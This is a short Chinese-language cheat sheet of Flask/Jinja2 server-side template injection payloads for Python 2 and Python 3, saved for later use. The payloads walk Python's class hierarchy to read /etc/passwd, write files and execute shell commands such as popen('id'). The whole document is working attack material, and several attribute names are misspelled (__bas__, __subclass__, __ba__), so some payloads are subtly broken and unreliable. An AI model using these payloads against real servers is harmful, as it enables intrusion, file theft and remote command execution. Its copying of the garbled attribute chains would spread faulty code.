flask模板注⼊payload——python2和python3
把模板注⼊的payload记录在这⾥,⽅便以后使⽤。
主要分为两类python2和python3
还有各种过滤和绕过
python2
⽂件操作
找到file类
[].class.bas[0].subclass()[40]
payload:
#读⽂件
[].__class__.__bas__[0].__subclass__()[40]('/etc/passwd').read()
#写⽂件
[].__class__.__bas__[0].__subclass__()[40]('/tmp').write('test')
命令执⾏
os执⾏
[].class.bas[0].subclass()[59].init.func_globals.linecache下有os类,可以直接执⾏命令
payload:
[].__class__.__bas__[0].__subclass__()[59].__init__.func_globals.linecache.os.popen('id').read()
#eval,impoer等全局函数
[].class.bas[0].subclass()[59].init.globals.__builtins__下有eval,__import__等的全局函数,可以利⽤此来执⾏命令
payload:
[].__class__.__bas__[0].__subclass__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
[].__class__.__bas__[0].__subclass__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
[].__class__.__bas__[0].__subclass__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
[].__class__.__bas__[0].__subclass__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
python3
⽂件操作
payload:
{% for c in [].__class__.__ba__.__subclass__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
命令执⾏
payload:
{% for c in [].__class__.__ba__.__subclass__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
